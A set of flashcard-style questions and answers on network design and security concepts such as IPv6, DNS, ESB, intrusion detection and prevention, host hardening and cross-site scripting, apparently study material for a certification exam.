What role does placement of security devices play in advanced network design?
Placement of security devices and network design: Given the ongoing and increasing security threats, the need for solid security systems is a top priority for owners and operators of various commercial buildings and facilities. A vital step in establishing a quality security system is…
Show answer and Breakdown
Answer:
its preliminary design after the security risk assessment has been done. In contrast to the prescriptive code requirements applied to fire protection systems, computer security does not come with prescriptive codes in place and specific requirements for these systems by and large are found in the manufacturers’ installation recommendations. Rather than a security risk assessment, this information focuses on the complexities involved with establishing quality design documentation for a security system, primarily drawings, that clearly convey the system design and operational goals to the owner and installing contractor.
The Role of SCADA Systems in Network Design
How do SCADA systems play a part in network design?
SCADA Systems include hardware and software components. Hardware collects and circulates data into a computer system…
Show answer and Breakdown
Answer:
installed by SCADA software. The computer then runs this data and applies or presents it in a timely manner. This system also maintains a log of all events into a file stored on a hard disk or forwards them to a printer. It alerts the system when hazardous conditions develop by sounding alarms.
The Role of Voice Over IP (VOIP) in Network Design
What is Voice Over IP and what aspects should be considered in network design.
VoIP (Voice over IP) is an IP telephony term for a group of facilities that control the delivery of voice data over the Internet. VoIP entails forwarding…
Show answer and Breakdown
Answer:
voice information in digital form in packets rather than through traditional circuit-committed protocols of the public switched telephone network (PSTN). A significant benefit of VoIP and Internet telephony is it bypasses the tolls charged by standard telephone service.
What is IPv6 and What Role Does it Play in Network Design?
Deeply describe IPv6 and the role it plays in modern advanced network design.
IPv6 is the abbreviation for “Internet Protocol Version 6”. It’s the upgraded version and successor to IPv4, the first application used in the Internet and still in current use. It’s an Internet Layer protocol for packet-switched internetworks. The predominant motive for the redesign of Internet Protocol is the projected IPv4 address exhaustion. IPv6 was specified in December 1998 by the Internet Engineering Task Force (IETF) with the publication of an Internet standard specification, RFC 2460. IPv6 also applies new features that simplify elements of address assignment (stateless address auto configuration) and network renumbering (prefix and router announcements) when…
Show answer and Breakdown
Answer:
switching Internet connectivity providers. The IPv6 subnet size has been standardized by designating the size of the host identifier part of an address to 64 bits to perform an automated mechanism for forming the host identifier from Link Layer media addressing information (MAC address). Attributes and differences from IPv4 IPv6 is a conservative extension of IPv4. Many transport and application-layer protocols need minimal-to-no modification to operate over IPv6; exceptions are application protocols that implement internet-layer addresses, such as FTP or NTPv3. The measurement of a subnet in IPv6 is 264 addresses (64-bit subnet mask), the square of the size of the entire IPv4 Internet. Address space utilization rates will likely be minimal in IPv6, but network management and routing will be more effective based on the design decisions of large subnet space and hierarchical route aggregation.
What is Stateless Address Auto-Configuration?
Describe stateless address auto-configuration and the role it plays in network design.
Stateless address auto-configuration: IPv6 hosts can auto-configure themselves when linked to a routed IPv6 network using ICMPv6 router discovery messages. Once connection with the network is established, a host sends…
Show answer and Breakdown
Answer:
a link local multicast router solicitation request for its configuration specifications; if configured properly, routers respond to such a request with a router advertisement packet that contains the network-layer configuration parameters. Host Configuration Protocol for IPv6 (DHCPv6) or hosts may have a fixed configuration. Routers have specialized requirements for address configuration, as they often are sources for auto configuration information, such as router and prefix advertisements. Stateless configuration for routers are accomplished with a specific router renumbering protocol.
What is Multicast on IPv6?
Describe the role of Multicast in IPv6.
Multicast: Multicast, is the mechanism where a single packet is sent to multiple destinations, and is a component of the base specification in IPv6 as opposed to IPv4, where it is optional (although usually implemented). IPv6 does not…
Show answer and Breakdown
Answer:
apply broadcast, which is the capability of transmitting a packet to all hosts on the attached link. The same result can be achieved by sending a packet to the link-local all hosts multicast group, thus negating the notion a broadcast address is the highest address in a subnet (the broadcast address for that subnet in IPv4) and considered a normal address in IPv6.
The Role Internet Protocol Security (IPsec) in Network Design
Describe the role of IPSec in network design.
Internet Protocol Security (IPsec), the protocol for IP encryption and authentication, creates an essential component of the…
Show answer and Breakdown
Answer:
base protocol suite in IPv6. IPsec support is a requirement in IPv6; with IPv4 it is optional though commonly implemented. IPsec, however, is not commonly used except for securing traffic between IPv6 Border Gateway Protocol routers.
Complex network security solutions for data flow
Things to consider regarding complex network security solutions for data flow.
Preserving a secure network environment through existing network security technologies is a significant challenge due to several factors: Increasingly advanced and fast-evolving cyber threats, motivated by profit as opposed to notoriety, circumvent one or more standalone security technologies. The costs and complexities involved with…
Show answer and Breakdown
Answer:
controlling an increasingly distributed network with seemingly no limit, increases the pressure on overloaded resources. The performance and processing capability required to provide complete content level protection is challenging without purpose-built hardware. Most standalone network security systems are made up of single-purpose security software applied to PC-based hardware platforms, and offer basic network security operations. These standalone products don’t offer extensive security, network deployment flexibility, and advanced functionality essential to obstruct complex network-level and content-level IT Security threats.
Considerations on secure data flows to meet changing business needs
Considerations on secure data flows to meet changing business needs.
The evolving business models and rapid increase in global data flows have triggered an international stocktaking trend and these various processes will also be informative. Standard security technologies such as…
Show answer and Breakdown
Answer:
access control and encryption do not directly handle enforcement of information flow policies. A new method in recent development has been the use of programming-language techniques for specifying and imposing information flow policies.
What is the Domain Name System (DNS)?
Define and describe Domain Name System (DNS).
Domain Names System (DNS) is an essential component of the Internet. By and large, users don’t have a working knowledge of DNS functioning, but use it every time they are…
Show answer and Breakdown
Answer:
on the Internet. DNS is the mechanism that translates IP address 192.168.1.200 to a name www.mywebsite.com and vice versa. It is much simpler to remember a name such as www.mywebsite.com than an IP address. Electronic mail, web browsing, and other Internet-based applications depend on DNS. Some techniques to secure your DNS information: DNS queries, zone transfers, and dynamic updates.
What are Directory Services?
Describe directory services and the role they play in network design.
A directory service is the software application that stores, arranges, and offers access to information in a directory. In software engineering, a directory is a…
Show answer and Breakdown
Answer:
map between names and values. It provides a list of values that can be looked up for a given name. As a word in a dictionary can have more than one definition, in a directory, a name may be correlated to multiple, different pieces of information. As with words that can have various parts of speech and varied definitions, a name in a directory may have varied types of data.
Network Design Consideration, Building Layouts and Facilities Management
Things to consider when designing a network, regarding building layouts and facilities management.
While designing the physical structure of a network, the first task will be to plan for the site and its topology. A site is a group of one or more interconnected (usually a local area network) TCP/IP subnets. The network between the subnets must be…
Show answer and Breakdown
Answer:
highly functional and fast (512 Kbps and higher). Although the sites are defined on the basis of location, they can be extended over multiple locations. A site structure is defined by a physical environment, whereas a domain is the logical environment of the network. A site can contain one or several domains, and a domain can contain one or several sites. Sites are not included in Active Directory namespace. Although when browsing the logical namespace a user won’t use its name, the site name is a part of DNS records. Therefore, sites are required to have a valid DNS name. Sites are used to control the logon traffic, replication traffic, distributed file system (Dfs), and file replication service (FRS).
Network Topology – Bus, Ring, Star, Mesh and Wireless
A deeper look into network topology types, bus, ring, star, mesh and wireless.
Network topology — known as the pattern in which the network medium is linked to the computers and other networking components. Here are the major topologies associated with local area networking
- Bus topology: a type of physical network design where computers in the network are connected through a single coaxial cable known as a bus.
- Ring topology: a type of physical network design where all computers in the network are connected in a closed loop. Each computer or device in a Ring topology network functions as a repeater. It sends data by passing a token around the network in order to avoid the collision of data between two computers that want to transmit messages simultaneously. If a token is free, the computer on standby to send data obtains it, attaches the data and destination address to the token, and sends it. When the token reaches its destination computer, the data is copied. The token is then sent back to the originator. The originator sees that the message has been copied and received and removes the message from the token, rendering the token free and available to be used by the other computers in the network to send data. In this topology, if one computer fails, the entire network goes down.
Click to view the others:
Show answer and Breakdown
Answer:
Star topology: a type of physical network design where each computer in the network is connected to a central device, or hub, through an unshielded twisted-pair (UTP) wire. Signals from the sending computer go to the hub and are then distributed to all the computers in the network. Since each workstation has its own connection to the hub, it is easy to troubleshoot. This is the most common topology used for networks., Mesh topology: a type of physical network design where all devices in a network are connected to each other with many redundant connections. It provides many paths for the data traveling on the network to reach its destination. Mesh topology also offers redundancy in the network. It uses the full mesh and partial mesh techniques to connect devices., Wireless topology: a type of physical network design without using cable as the network medium. Wireless topology removes the need for cables. A wireless LAN consists of a transceiver unit, called a wireless access point, that is connected to servers or directly to the network and other devices using a standard cabled network protocol, such as Ethernet or Token Ring. In the wireless network, client computers communicate with the network-attached transceivers by using their own transceivers. The most common wireless media are infrared light and radio waves.
Multi-tier networking data design considerations
A deep look into multi-tier network architecture design.
Multi-tier architecture is often labeled as n-tier architecture. It is a client–server architecture where the presentation, the application processing, and the data management are logically independent processes. For example, an application that uses…
Show answer and Breakdown
Answer:
middleware to process data requests between a user and a database uses the multi-tier architecture. The leading use of multi-tier architecture is the three-tier architecture. N-tier application architecture provides a system for developers to run a flexible and reusable application. By splitting up an application into tiers, developers only have to be concerned with one layer at a time rather than having to rewrite the entire application over. There should be a presentation tier, a business or data access tier, and a data tier. The concepts of layer and tier are terms that are exchanged in concept, although there is a noted difference: a layer is a logical structuring mechanism for the elements that make up the software solution, while a tier is a physical structuring mechanism for the system infrastructure.
Trends and considerations in network components
A brief summary of fundamental network components.
The fundamental components of a network have (for the most part) remained unchanged in the last few years. NICs, switches, cabling, routers, and storage have become…
Show answer and Breakdown
Answer:
more affordable while supporting increased bandwidth and easier management. Selecting options for basic network components is a fairly straightforward process for solution providers working with SMB clients. Switches and devices that use Power over Ethernet (PoE) technology are gaining acceptance, and there are a range of unique storage options available for the client, such as inexpensive NAS and SAN systems.
What are Deployment Diagrams and What is their Purpose?
Define Deployment Diagrams and describe their purpose in network planning.
Deployment diagrams assist in envisioning the topology of the physical components of a system where the software components are utilized. So deployment diagrams are used to specify the static deployment view of a system. Deployment diagrams are made up of nodes and their relationships. The name Deployment means…
Show answer and Breakdown
Answer:
the detailing of the purpose of the diagram. Deployment diagrams are used for specifying the hardware components where software components are implemented. Component diagrams and deployment diagrams are very similar. Component diagrams are tools to describe the components and deployment diagrams show how they are deployed in hardware. UML is mainly concerned with software artifacts of a system. But these two diagrams are special diagrams used to address software components and hardware components. UML diagrams are mainly used to address logical components, but deployment diagrams are developed to focus on hardware topology of a system. Deployment diagrams are the tools of system engineers. Deployment diagrams are designed to: Visualize hardware topology of a system. Describe the hardware components used to deploy software components. Describe runtime processing nodes.
Transport Layer Security and its Advantages Over SSL
What is Transport Layer Security (TLS) and what advantage does it have over Secure Socket Layer (SSL)?
Transport Layer Security (TLS) and the earlier developed Secure Sockets Layer (SSL), are cryptographic protocols that implement security for communications over networks. TLS and SSL encrypt portions of network connections at the Transport Layer end-to-end. Many versions of these protocols are utilized in applications such as email and instant messaging. A prime benefit of the TLS protocol is…
Show answer and Breakdown
Answer:
client/server applications can interact across a network in a specialized way that blocks eavesdropping and tampering. TLS offers endpoint authentication and communications privacy over the Internet using cryptography. TLS also offers RSA security with 1024 and 2048 bit strengths.
What are Static Routes Router Settings and Why are they Secure?
Determine why the use of static routes is a security best practices for router settings.
Static Routes One of the most secure routing solutions for your router is the use of static routes to enable Layer 3 connectivity. These are protected from route spoofing attacks because the router does not depend on routing data transmitted from other routers: The information is configured locally on your perimeter router. Static routes are commonly used in the following situations:
Show answer and Breakdown
Answer:
You have a small number of destinations to configure. Only one or two paths exist to each destination. With static routes, the following is true: A default route is used on the perimeter router to reach external resources. Specific internal routes are used to reach internal resources.
What is the Enterprise Service Bus (ESB) Software Architecture Model?
Define and describe Enterprise Service Bus (ESB).
Enterprise Service Bus (ESB) )An enterprise service bus (ESB) is a software architecture model used for developing and applying communication between mutually interacting…
Show answer and Breakdown
Answer:
software applications in Service Oriented Architecture. As a model designed for distributed computing, it’s a specialized form derived from the general client server software architecture model and supports strictly asynchronous message oriented design for interaction between applications. Its main use is in Enterprise Application Integration of heterogeneous and complex landscapes. The concept of ESB has been developed based on the Bus concept found in computer hardware architecture added with the modular and concurrent design of advanced-performance computer operating systems. The reasoning behind this was to establish a standard, structured, and general purpose concept for describing implementation of loosely connected software components (or services) required to be singularly deployed, running, heterogeneous, and discordant within a network. ESB is also the underlying network design of the Internet and the standard implementation pattern for Service Oriented Architecture.
What are the Main Functions of an Enterprise Service Bus (ESB)?
Determine the main functions of an Enterprise Service Bus (ESB).
Duties of an ESB: An ESB transports the design concept of current operating systems to networks of discordant and independent computers. Like concurrent operating systems an ESB supports commonly needed commodity services in addition to adoption, translation, and routing of a client request to the appropriate answering service. Main functions of an ESB:
Show answer and Breakdown
Answer:
Monitor and control routing of message exchange between services Resolve contention between communicating service components Control deployment and versioning of services
Using ESB with Atomic Services
The relation of ESB with atomic services.
ESB and Atomic Services: An ESB offers an abstraction layer on top of an implementation of an…
Show answer and Breakdown
Answer:
enterprise messaging system. In order for an integration broker to be seen as an authentic ESB, its base functions would need to be split up into their basic and atomic parts. The atomic elements would then be capable of being individually applied across the bus while also working together when needed.
What Service-Oriented Architecture?
Define and describe service-oriented architecture (SOA).
In computing, a service-oriented architecture (SOA) is a flexible group of design principles applied in the systems development and integration phases. A deployed SOA-based architecture will support a loosely integrated series of services that can be used in several business domains. Service-Oriented Architecture also guides consumers of its services to others…
Show answer and Breakdown
Answer:
available SOA-based services. For example, several separate departments within a company may develop and use SOA services in different implementation languages; their clients will benefit from a well understood, comprehensive interface to access them. XML is widely used for interfacing with SOA services, though not required. SOA specifies how to integrate widely dissimilar applications in the web space via multiple implementation platforms. Rather than defining an API, SOA specifies the interface in terms of protocols and functionality. An endpoint is the entry point for such an SOA implementation.
What is Security Information and Event Management (SIEM)?
Define and describe Security Information and Event Management (SIEM)?
Security Information and Event Management solutions are an integration of the formerly discordant product categories of SIM (security information management) and SEM (security event management). SIEM technology offers real-time…
Show answer and Breakdown
Answer:
examination of security alerts produced by network hardware and applications. SIEM solutions are available as software, appliances or managed services, and are also used to record security data and produce reports for compliance purposes. The acronyms SEM, SIM, and SIEM have been used interchangeably, even with the known differences in meaning and product functionality. The aspect of security management that focuses on real-time monitoring, correlation of events, notifications and console views is known as Security Event Management (SEM). The second aspect provides ongoing storage, analysis, and reporting of log data and is known as Security Information Management (SIM).
What is Database Access Monitor (DAM)?
Define and describe Database Access Monitor (DAM).
Database Access Monitor (DAM) Database access monitoring (DAM) is a database security method used for overseeing and analyzing…
Show answer and Breakdown
Answer:
database activity that functions separately from the database management system (DBMS) and does not depend on any form of native (DBMS-resident) auditing or native logs such as trace or transaction logs. DAM is typically performed on an ongoing basis and in real-time.
What is Database Activity Monitoring and Prevention (DAMP)?
Define and describe Database Activity Monitoring and Prevention (DAMP).
Database activity monitoring and prevention (DAMP) is an extension to DAM that in addition to monitoring and alerting, also prohibits unauthorized activities. DAMP helps businesses…
Show answer and Breakdown
Answer:
address regulatory compliance mandates like the Payment Card Industry Data Security Standard (PCI DSS), the Health Insurance Portability and Accountability Act (HIPAA), the SarbanesOxley Act (SOX), U.S. government regulations and EU regulations. DAMP is also an important mechanism that safeguards sensitive databases from external attacks by cybercriminals. According to Gartner, ―DAMP provides privileged user and application access monitoring that is independent of native database logging and audit functions. It can function as a compensating control for authorized user separation-of-duties issues by overseeing administrator activity. The technology also enhances database security by scanning for anomalous database read and update activity from the application layer. Database event aggregation, correlation, and reporting provide a database audit capability without having to activate native database audit functions.
What are Service Enabled (SE) Applications?
Define Service Enabled (SE) applications.
Service-Enabled (SE) applications are built from the bottom up on…
Show answer and Breakdown
Answer:
Simple Services which allows for highly flexible solutions, capable of solving today’s integration challenges, and provides flexibility to evolve as an organization or user’s needs evolve.
What is Web Service Security (WS-Security)?
Define Web Service Security (WS-Security).
Web Service Security (WS-Security) is a security service that is used for enabling message-level security for Web services. To activate this service, the user must…
Show answer and Breakdown
Answer:
verify the related WSSE policy information is available to the Managed Servers. The SOAP messages that are transmitted between two or more Web services can be protected by WS-Security using security tokens, digital signatures, and encryption.
The Role of Security Controls for Hosts
Determine the role that Security Controls play for hosts.
Security controls are protective mechanisms or counteragents to prevent, counteract, or reduce security risks. Security control monitoring requires…
Show answer and Breakdown
Answer:
discerning which security controls will be monitored. FIPS 199 can accommodate the chosen controls to be monitored. FIPS 199 assists with determining the security groups or categories of the information and information systems, and also highlights the elements that are most vital to the organization. After establishing security controls, the next task is evaluating control functions and whether they’re performing at the level required by the system security plan; this is usually handled by the information system owner. Security controls can be applied through audits, self-assessments, and other review methods. NIST Special Publication 800-53A issues a standard approach for the assessment of security controls
What are Host-Based Firewalls?
Define host-based firewalls.
A host-based application firewall can scan for any application input, output, and/or system service calls made from, to, or by an application. This is done by…
Show answer and Breakdown
Answer:
analyzing data run through system calls as an alternative to, or in addition to, a network stack. Firewalls configured with a host-based application can only afford protection to the applications running on the same host. The Mac OS X application firewall is an example of a host-based application that administers system service calls. Additionally, host-based application firewalls offer network-based application firewalling.
What is the Trusted Operating System (TOS)?
Define and describe Trusted Operating System (TOS).
Trusted Operating System (TOS) refers to an operating system that affords support for multifaceted security and evidence of correctness to satisfy…
Show answer and Breakdown
Answer:
a specific set of government requirements. The Common Criteria, added with the Security Functional Requirements (SFRs) for Labeled Security Protection Profile (LSPP) and Mandatory Access Control (MAC) is the most common selection of criteria for trusted operating system design. The Common Criteria is the result of a dedicated endeavor spanning several years by the governments of the U.S., Canada, United Kingdom, France, Germany, the Netherlands and other countries with an objective to develop coordinated security criteria for IT products.
Two Techniques for Endpoint / Antivirus Security Software
What are the two techniques for endpoint security / antivirus software?
Endpoint security software / anti-virus software is a common tool that scans for and removes known viruses after the computer downloads or executes a program. To identify a virus, there are two common techniques employed by anti-virus software:
Show answer and Breakdown
Answer:
The first, and most common technique of virus detection is referencing a list of virus signature definitions. This is done by inspecting the content of the computer’s memory (RAM, and boot sectors) and the files stored on fixed or removable drives (hard drives, floppy drives), and cross-references those files against a database of known virus “signatures”. The drawback: users are only shielded from viruses that pre-date their last virus definition update. The second technique is employing a heuristic algorithm to locate viruses based on common behaviors. A heuristic algorithm can discover viruses that antivirus security companies have yet to develop a signature for. Some anti-virus programs can inspect opened files in addition to sent and received emails at random in a similar manner. This practice is known as “on-access” scanning.
Virus Removal as a Recovery Method
Be familiar with the argument for using virus removal as a recovery method.
System Restore used for Windows Me, Windows XP, Windows Vista, and Windows 7 is a tool that restores the registry and critical system files to a previous state. A virus can cause…
Show answer and Breakdown
Answer:
an operating system to hang, and a following hard reboot will cause a system restore point from the same day to be compromised. Restore points from preceding days should help return the computer to a functional state if the virus isn’t programmed to damage restore files. Unfortunately there are viruses that can deactivate system restore and other vital tools such as Task Manager and Command Prompt.
Operating System Re-installation as a Recovery Method
How operating system re-installation is used as a recovery method.
Reinstalling the operating system is another measure of virus removal. It entails reformatting the computer’s hard drive and installing the OS from its original media, or restoring…
Show answer and Breakdown
Answer:
the partition with a clean backup image. One of the plusses of this method is it’s simple and quicker than running several antivirus scans, and can eliminate malware. The minuses include reinstallation of all other software, reconfiguring, and restoring user preferences. Data can be preserved by booting off of a Live CD or installing the hard drive into another computer and rebooting from the other computer’s operating system. Use extra caution when restoring any hardware from an infected system to prevent contamination of the new computer.
What is an Intrusion Prevention System (IPS)?
Define Intrusion Prevention System (IPS).
An Intrusion prevention system (IPS) is a network security device that scans network and/or system activities for malicious or unwarranted…
Show answer and Breakdown
Answer:
behavior and can respond, in real-time, to prohibit or prevent those activities. As an example, Network-based IPS will function in-line to scan all network traffic for malicious code or attacks. When malicious activity is picked up, it can eliminate the harmful packets while permitting all other traffic to pass. Intrusion prevention mechanisms are considered by some as an extension of intrusion detection (IDS) technology.
What is a Host-Based Intrusion Prevention System (HIPS)?
Define Host-Based Intrusion Prevention System (HIPS).
A host-based intrusion prevention system (HIPS) is an application usually used on a single computer. It complements traditional fingerprint-based and heuristic antivirus detection techniques, since it doesn’t require ongoing updates to counteract new malware. When a malicious code needs to alter the system or other software, an HIPS system will pick up some of the resulting changes and prohibit the action automatically or alert the user for permission. It can deal with encrypted and unencrypted traffic equally and cannot detect events scattered over the network. A host-based IPS (HIPS) is where the intrusion prevention mechanism is applied to that specific IP address, usually on a…
Show answer and Breakdown
Answer:
single computer. HIPS complement traditional finger-print-based and heuristic antivirus detection methods, since it does not require ongoing updates to counteract new malware. Malicious code needs to alter the system or certain software on a computer to successfully disrupt the operating system. HIPS will pick up on these red flags (alterations) and prohibit the action automatically or will alert the user for permission.
Host Hardening
Define and describe host hardening.
Host hardening begins with a requirements evaluation to determine server function and to determine the risks involved. Security is a fine balance between ultimate security and usability. In practical terms, the more secure a device is, its usability decreases. Standard Operating Environment is a…
Show answer and Breakdown
Answer:
specification for employing a standard architecture and applications within an organization. There is no systemized SOE standardization; however, organizations usually employ standard disks, operating systems, computer hardware, and standard applications and software within their own organization.
Group Policy Controls
What control ability exists within Group Policy?
The goals for each Group Policy implementation will differ based on user location, job requirements, computer proficiency, and corporate security requirements. In some cases, you might…
Show answer and Breakdown
Answer:
deactivate functionality from users’ computers to prevent them from modifying system configuration files, or remove applications that are not required for users to perform their jobs. In other cases, a Group Policy might be applied to configure operating system options, specify Internet Explorer settings, or establish a security policy. A restricted shell is used to establish a controlled environment (more controlled than the standard shell).
Purpose, Use and Examples of Warning Banners
Define Warning Banners, then provide the purpose and use examples of them.
Warning banners: A widely used method for computer access is the use of warning banners. Warnings are an effective tool for providing adequate notice regarding the obligations and responsibilities entailed with using the server and networking environments. The purpose of warning banners:
Show answer and Breakdown
Answer:
From a legal standpoint, they establish the level of expected privacy and serve as consent to real-time monitoring from a business standpoint. Real-time monitoring can be conducted for security reasons, business reasons, or technical network performance reasons. These banners tell users that their connection to the network signals their consent to monitoring The warning banners can be established by the system or network administrator’s common authority to consent to a law enforcement search. Some use examples of warning banners: Access to this system and network is restricted. Use of this system and network is for official business only. Systems and networks are subject to monitoring at any time by the owner. Using this system implies consent to monitoring by the owner. Unauthorized or illegal users of this system or network will be subject to discipline or prosecution.
What is Asset Management (Inventory Control)?
Define asset management (inventory control).
Asset management (inventory control) Asset management concerns the management of assets of an organization. An asset is defined…
Show answer and Breakdown
Answer:
as an object of value. It is vital for a company to identify, monitor, classify, and apply ownership for the most important assets. The primary objective of asset management is to ensure all assets are protected.
What is data exfiltration?
Define data exfiltration.
The definition of data exfiltration:
Show answer and Breakdown
Answer:
Data exfiltration, also known as data extrusion, is the unwarranted transfer of data from a computer.
What is a Host-Based IDS (HIDS)
Define Host-Based Intrusion Detection Systems (HIDS).
A host-based IDS (HIDS) is an Intrusion Detection System that’s applied to the system to be scanned for unwarranted activity. HIDS is specifically concerned with…
Show answer and Breakdown
Answer:
the data that is directed to or originating from the system on which HIDS is installed. In addition to traffic on the network, it also monitors other aspects of the system such as file system access and integrity, and user logins for capturing malicious activities. BlackIce Defender and Tripwire are examples of HIDS. Tripwire is an HIDS tool that instantly calculates the choices to examine for modifications.
What is a Network Intrusion Prevention System (NIPS)?
Define a Network Intrusion Prevention System (NIPS).
Network Intrusion Prevention System (NIPS) Network intrusion prevention system (NIPS) is a hardware/software platform that is programmed to…
Show answer and Breakdown
Answer:
detect, examine, and report on security related events. It examines traffic and based on the security policy, can eliminate malicious traffic. It can pick up events scattered over the network and respond.
What is a Network Intrusion Detection System (NIDS)?
Define a Network Intrusion Detection System (NIDS).
A network intrusion detection system (NIDS) is an intrusion detection mechanism that attempts to pick up on malicious activity such as…
Show answer and Breakdown
Answer:
denial of service attacks, port scans, or even attempts to hack computers by monitoring network traffic. NIDS scans all incoming packets and tries to isolate anomalous patterns called signatures or rules. It also tries to find incoming shell codes using the same process as an ordinary intrusion detection system.
What is the Difference Between HIPS and NIPS?
What are the main differences between Host-Based Intrusion Prevention Systems (HIPS) and Network Intrusion Prevention Systems (NIPS)?
HIPS can deal with encrypted and unencrypted traffic, because it can examine the data post-decryption on the host. NIPS does not rely on…
Show answer and Breakdown
Answer:
processor and memory on computer hosts but uses its own CPU and memory. NIPS are a single point of failure, which is regarded as a detriment; however, this also makes it easy to maintain. This aspect also applies to all network devices and can be resolved by implementing the network accordingly. NIPS can read and respond to events dispersed over the network in contrast to HIPS, where that function is restricted to the host’s data itself. It would require a lot of time to report it to a central decision making mechanism and report back to block.
What is the Statistical Anomaly Detection Method?
What is the Statistical Anomaly Detection Method and what is its role in IDS detection?
Statistical Anomaly Detection: The Statistical Anomaly Detection method, also known as behavior-based detection, cross-checks the current system operating characteristics on many base-line factors such as…
Show answer and Breakdown
Answer:
CPU utilization, file access patterns and disk usages, etc. Using this technique, the Intrusion Detection System provides the capability for either a Network Administrator to fashion the profiles of authorized activities or set the IDS in learning mode so that it can learn what qualifies as normal activity. To determine the rate of false negatives IDS produces, a considerable amount of time is needed to accurately measure that data. This is the main disadvantage of IDS in that an attacker can gradually change his behavior over time and trick the system.
The Route of Vulnerabilities in Applications
How do vulnerabilities exist in applications, and why is proper application security so important?
Application security consists of steps taken throughout the application’s life-cycle to avoid exceptions in the security policy of an application or…
Show answer and Breakdown
Answer:
inherent system vulnerabilities through flaws in the design, development, deployment, upgrade, or maintenance of the application. Applications only control the use of resources available, and not which resources are granted to them. They, in turn, ascertain the use of these resources by users of the application.
Web application security design considerations
What must be considered regarding web application security?
Secure by design, by default, by deployment: When designing a Web application, the objective of the software architect is to…
Show answer and Breakdown
Answer:
reduce the degree of complexity by dividing tasks into different areas while designing a secure, quality performance application. Follow these guidelines to make sure your application satisfies your requirements, with solid performance in scenarios common to Web applications.
Partition your application logically
How to partition your application logically.
Use layering to separate your application logically into presentation, business, and data access layers. This helps create …
Show answer and Breakdown
Answer:
manageable code and allows you to monitor and optimize the performance of each layer separately. A clear logical separation also provides wider choices for scaling your application.
Use abstraction to implement loose coupling between layers
How to use abstraction to implement loose coupling between layers.
This can be achieved by identifying interface components, such as a façade with well-known inputs and…
Show answer and Breakdown
Answer:
outputs that communicate requests into a format understood by components within the layer. In addition, you can also use Interface types or abstract base classes to define a shared abstraction that interface components must implement.
Understand how components will communicate with each other
Why you should understand how components will communicate with each other.
This necessitates an understanding of the deployment scenarios your application must accommodate. You must ascertain if…
Show answer and Breakdown
Answer:
communication across physical boundaries or process boundaries should be supported, or if all elements will run within the same process.
Consider caching to minimize server round trips in Web Apps
Why you should consider caching to minimize server round trips in Web Apps.
When designing a web application, think about using methods such as caching and output buffering to minimize round trips between the browser and the…
Show answer and Breakdown
Answer:
Web server, and between the Web server and downstream servers. A properly designed caching strategy is probably the most important performance-related design specification. ASP.NET caching features include output caching, partial page caching, and the Cache API. Design your application to take advantage of these features.
Implement Logging and Instrumentation
Why implementing logging and instrumentation is best practice in application security.
You should audit and log activities across the layers and tiers of your application. These logs can be…
Show answer and Breakdown
Answer:
tools to trace suspicious activity, which frequently signals a red flag of a possible attack on the system. Be aware it can be challenging to log problems that occur with script code running in the browser.
Consider authenticating users across trust boundaries
Application Security best practice – consider authenticating users across trust boundaries.
Why is authenticating users across trust boundaries a best practice for application security?
Show answer and Breakdown
Answer:
You should design your application to authenticate users whenever they intersect a trusted boundary such as, accessing a remote business layer from the presentation layer.
Design your Web application to run using a least-privileged account
Application security best practice – Design your Web application to run using a least-privileged account.
Why should you design your web application to run using a least-privileged account?
Show answer and Breakdown
Answer:
If an attacker is able to hijack a process, the process identity should have prohibited access to the file system and other resources to mitigate the possible damage.
Application Flaws – Cross Site Scripting (XSS) Vulnerabilities
What are Cross Site Scripting (XSS) Vulnerabilities in applications and how do these vulnerabilities occur?
XSS: Cross Site Scripting vulnerabilities or XSS flaws come about whenever an application takes user-supplied data and sends it to a Web browser without…
Show answer and Breakdown
Answer:
first verifying or encoding the content. In numerous situations attackers locate these flaws in Web applications. XSS flaws allow an attacker to run a script in the victim’s browser, giving the culprit free reign on user sessions, disfigure Web sites, and possibly launch worms, viruses, malware, etc. to steal and access sensitive data from the user’s database.
What is Application Sandboxing?
What is an application sandbox?
A sandbox is a security mechanism for dividing running programs. It is often used to run…
Show answer and Breakdown
Answer:
untested code or untrusted programs from unconfirmed third-parties, suppliers, untrusted users, and untrusted websites. The sandbox offers a strictly controlled set of resources for guest programs to run in, such as scratch space on disk and memory. Network access, the ability to scan the host system or read from input devices are usually blocked or heavily restricted. In this case, sandboxes are a type of virtualization.
The Importance of Secure Coding Standards
What is the importance of having secure coding standards?
Secure coding standards specify rules and recommendations to guide the development of secure software systems. Establishing secure coding standards…
Show answer and Breakdown
Answer:
sets the foundation for secure system development as well as a common set of criteria that can be applied to examine and evaluate software development efforts and software development tools and processes.
Privilege Escalation in Web Applications
Does privilege escalation play a similar role in web application security, as it does in network security?
As we have discussed before, privilege escalation is the act of exposing a bug or design error in a software application to gain access to…
Show answer and Breakdown
Answer:
resources that otherwise would have been safeguarded from an application or user. The outcome is the application performs actions with more privileges than intended by the application developer or system administrator.
Improper Storage of Sensitive Data in Web Applications
What to consider regarding storage of sensitive data in web applications.
The application stores sensitive data in memory that is not secured, or that has been…
Show answer and Breakdown
Answer:
improperly locked, which might allow the memory to be written to swap files on disk by the virtual memory manager. In this scenario data is more accessible to external agents.
What is Fuzzing / Fault Injection?
Define and describe fuzzing / fault injection.
Fuzzing, or fuzz testing is a method that employs human or computer-based testing in which all variants of anticipated and unanticipated input is…
Show answer and Breakdown
Answer:
fed to your application. For example, if your application expects a user to enter a surname, with fuzzing, he would enter numbers, punctuation, extended and control characters, etc. As this testing entails little or no knowledge of the application being tested, it is also called a black box.
Secure Cookie Storage and Transmission
Know how to properly handle cookie storage and transmission.
A cookie, also known as an HTTP cookie, web cookie, or browser cookie, is used for an origin website to transmit state information to a user’s browser and for the browser to return the state information to the originating website. The state information can be used for authentication, identification of a user session, user’s preferences, shopping cart contents, or other activities that can be processed by storing text data on the user’s computer. Cookies cannot be…
Show answer and Breakdown
Answer:
programmed or transmitted viruses, nor can they deposit malware on the host computer. They can be used by spyware to track a user’s browsing history, a serious privacy issue that prompted US and European authorities/law makers to take aggressive action. Hackers can also swipe cookies to gain access to a victim’s web account.
Client-side processing vs. server-side processing
Know the difference between client-side processing vs. server-side processing.
Client-side processing is the function of operations performed by the client in a client-server relationship in a computer network. A client is a system application that’s executed on a user’s computer with…
Show answer and Breakdown
Answer:
connection to a server when needed. Operations may be conducted client-side when they need available data on the client but not the server. Here the user may need to add input because the server can’t fully process the operations in a timely fashion for all clients it serves. Also, if operations can be handled by the client without transmitting data over the network, it may require less time, bandwidth and have low security risk.
What is the Microsoft Ajax Library?
What is the Microsoft Ajax Library and why is it useful for application security?
The Microsoft Ajax Library is a JavaScript database that offers the features for the client portion of…
